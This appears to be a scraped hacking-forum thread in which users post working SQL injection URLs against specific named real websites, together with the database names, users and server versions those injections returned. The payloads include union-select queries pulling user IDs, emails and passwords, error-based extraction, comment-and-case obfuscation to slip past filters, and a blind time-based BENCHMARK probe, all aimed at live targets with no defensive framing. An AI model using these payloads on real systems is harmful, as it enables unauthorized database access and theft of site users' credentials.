=~=cicodroipo@localhost=!=5.1.71-community-log=!=my_cicodroipo=~=

http://cicodroipo.altervista.org/iniziativa.php?id=-57+union+all+select+1,2,3,4,5,6,(select+concat(0x3 d7e3d,ifnull(id_use,char(32)),0x3d213d,ifnull(emai l,char(32)),0x3d213d,ifnull(pass,char(32)),0x3d7e3 d)+from+my_cicodroipo.user+limit+0,1),7,8,9,10,11, 12,14--
=~=fabrizio_ceripp@localhost=!=5.5.42-cll=!=fabrizio_ceripp=~=

http://www.bobrgames.com/game.php?id=(select+1+from(select+count(*),concat( (select(select+concat(0x3d7e3d,user(),0x3d7e3d,ver sion(),0x3d7e3d,database(),0x3d7e3d))+from+informa tion_schema.tables+limit+0,1),floor(rand(0)*2))x+f rom+information_schema.tables+group+by+x)a)
=~=a7489_bobrgames@10.0.1.4=~=5.5.34-32.0-log=~=a7489_bobrgames=

grimnir
15.04.2015, 16:02
Code:
http://www.umbc.edu/careerpath/profileDetail.php?profileID=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)

трафф 2.9кк

5.5.13-log careerpath@www2.umbc.edu (mailto:careerpath@www2.umbc.edu)

palec2006
18.04.2015, 20:13
Сайт биомусора

http://ultras.org.ua/league/'XOR(if(ascii(substring((select (http://ultras.org.ua/league/'XOR(if(ascii(substring((select)+version()),1))>=53,BENCHMARK(2000000,MD5(NOW())),0))OR'.htm

5.5.34-0ubuntu0.13.04.1

Тема переехала по адресу /threads/424558/ (https://antichat.live/threads/424558/)